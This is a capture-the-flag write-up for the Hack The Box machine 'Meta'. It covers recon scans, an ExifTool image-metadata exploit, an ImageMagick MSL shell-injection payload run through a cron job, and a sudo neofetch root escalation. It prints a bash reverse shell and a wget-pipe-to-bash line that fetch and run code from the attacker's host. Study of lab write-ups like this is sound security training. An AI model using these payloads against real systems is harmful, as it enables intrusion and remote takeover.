Meta

Recon

└──╼ $sudo nmap -p- -A artcorp.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 19:22 UTC
Nmap scan report for artcorp.htb (10.129.178.202)
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Home
|_http-server-header: Apache
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   31.53 ms 10.10.14.1
2   31.83 ms 10.129.178.202

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.70 seconds
└──╼ $ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.artcorp.htb -fc 301 -t 100

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://FUZZ.artcorp.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________

dev01                   [Status: 200, Size: 247, Words: 16, Lines: 10, Duration: 3076ms]
└──╼ $gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u artcorp.htb
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://artcorp.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 234] [--> http://artcorp.htb/assets/]
/css                  (Status: 301) [Size: 231] [--> http://artcorp.htb/css/]

Checking out the main site doesn't give us much of value. The links don't go anywhere, so we focus on the interesting subdomain, dev01.artcorp.htb.

The subdomain:

Link goes to:

CVE-2021-22204

If the site is analysing image metadata, the first thought is to exploit the metadata analyser. CVE-2021-22204 is the ExifTool bug in its DjVu parsing that gives arbitrary code execution from a crafted image.

The first result is https://github.com/OneSecCyber/JPEG_RCE, so why not give it a go.
The exploit works exactly as in the PoC, but for some reason the reverse shell from it doesn't work.
Searching GitHub for CVE-2021-22204 fortunately gives us more options.

And we are in.
For quality of life, we stabilise the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg

User access

Running LinEnum returns nothing of value.
Running linpeas tells us to check:

  1. Sudo version 1.8.27

  2. [CVE-2019-13272] PTRACE_TRACEME

    Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
    Exposure: highly probable
    Tags: ubuntu=16.04{kernel:4.15.0-},ubuntu=18.04{kernel:4.15.0-},debian=9{kernel:4.9.0-},[ debian=10{kernel:4.19.0-} ],fedora=30{kernel:5.0.9-*}
    Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
    ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
    Comments: Requires an active PolKit agent.

  3. lrwxrwxrwx 1 root root 35 Aug 29 2021 /etc/apache2/sites-enabled/artcorp.htb.conf -> …/sites-available/artcorp.htb.conf

So, checking each of them:

  1. Sudo 1.8.27 seems vulnerable, but the exploit can't be run without the user's password, which we don't have.
  2. The PTRACE_TRACEME PoC doesn't seem to work on this machine (as linpeas notes, it requires an active PolKit agent).
  3. The symlink is dangling: the target file doesn't exist and we can't create it.

Then we run pspy to inspect what is going on in the system.
It seems to run a few scripts on a regular basis, a minute apart. Note that they run as UID 1000 (thomas), so anything we inject into them runs as that user:

2024/08/18 17:59:01 CMD: UID=1000 PID=4389 | /bin/bash /usr/local/bin/convert_images.sh
2024/08/18 18:00:01 CMD: UID=1000 PID=4405 | pkill mogrify

www-data@meta:/usr/local/bin$ mogrify --version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29 https://imagemagick.org
Copyright: © 1999-2020 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): fontconfig freetype jng jpeg png x xml zlib

Searching for “ImageMagick 7.0.10-36 CVE” gets us CVE-2020-29599: the -authenticate option (the password ImageMagick hands to Ghostscript when reading a PDF) is not escaped, so a crafted password injects shell commands. An MSL file can set it through the authenticate attribute, which is what the PoC from the blog post below does.
https://nvd.nist.gov/vuln/detail/CVE-2020-29599
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

<image authenticate='ff" `echo $(id)> ./0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

The PoC did work, but it made me mad. Three things:

  1. The files in /var/www/dev01.artcorp.htb/convert_images are getting deleted every minute.
  2. The <image xlink:href="msl:poc.svg" height="100" width="100"/> line has to contain the name of the file itself (here poc.svg), which I obviously missed.
  3. Getting the payload to run bash -i >& /dev/tcp/10.10.14.81/4444 0>&1 directly.

I ended up creating a sh script and running it via wget, after wasting way too much time here.

shell.sh, hosted on the attacker machine (10.10.14.81):

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.81/4444 0>&1

The one-liner the payload runs on the target to fetch and execute it:

wget -O - 10.10.14.81/shell.sh | bash

and changing the PoC to:

<image authenticate='ff" `wget -O - 10.10.14.81/shell.sh | bash`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

Stabilise the shell as before, and we finally have a shell as thomas and the user flag.

Priv esc

Running LinEnum.sh gives us:

[+] We can sudo without supplying a password!
Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"

GTFOBins has an entry for neofetch:
https://gtfobins.github.io/gtfobins/neofetch/

We can't run exactly that, as the sudo rule only permits neofetch with an empty-string argument, so we cannot pass --config or any other option.
Adding exec /bin/sh at the end of the ~/.config/neofetch config did not seem to work.

Looking again at sudo -l, we can see that the only environment variable being kept is XDG_CONFIG_HOME. Neofetch reads its config from ${XDG_CONFIG_HOME:-$HOME/.config}/neofetch/config.conf, and env_reset makes sudo set HOME to root's home directory, so the config in thomas's home is never read unless XDG_CONFIG_HOME points at it. We can set it using export XDG_CONFIG_HOME=/home/thomas/.config and then run sudo /usr/bin/neofetch \"\". It works!
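To make the config-resolution argument concrete, here is an added example (not the write-up's own commands) that mirrors how neofetch locates its config file and stages the one-line config used for the escalation. The users and the sudo rule are the ones shown above; the staging directory handed to the function is an assumption.

```sh
#!/bin/sh
# Added example, not code from the original write-up: shows where neofetch
# looks for its config under this sudo rule and stages a config that hands
# us a root shell. thomas, root and the env_keep entry come from the
# write-up; the staging directory is arbitrary.

set -eu

# neofetch resolves its config file as
#   ${XDG_CONFIG_HOME:-$HOME/.config}/neofetch/config.conf
# Under "sudo neofetch", env_reset sets HOME to /root, so without the kept
# XDG_CONFIG_HOME variable the file in thomas's home is never read.
# Arguments: HOME as seen by neofetch, XDG_CONFIG_HOME as seen by neofetch
# (empty string when unset).
neofetch_config_path() {
    home="$1"
    xdg="$2"
    printf '%s/neofetch/config.conf' "${xdg:-$home/.config}"
}

# stage_neofetch_config DIR
# Creates DIR/neofetch/config.conf. neofetch sources its config as bash, so
# "exec /bin/sh" replaces the root-owned neofetch process with a root shell.
# Prints the path written.
stage_neofetch_config() {
    dir="$1"
    mkdir -p "$dir/neofetch"
    printf 'exec /bin/sh\n' > "$dir/neofetch/config.conf"
    printf '%s/neofetch/config.conf' "$dir"
}

# On the box the chain is (not executed here):
#   export XDG_CONFIG_HOME=/home/thomas/.config
#   stage_neofetch_config "$XDG_CONFIG_HOME"
#   sudo /usr/bin/neofetch \"\"    # the rule only allows the literal "" argument
```

neofetch_config_path /root '' resolves to /root/.config/neofetch/config.conf, which is what sudo's env_reset gives us and why editing thomas's own config changed nothing; with XDG_CONFIG_HOME kept, the same call resolves back into /home/thomas/.config.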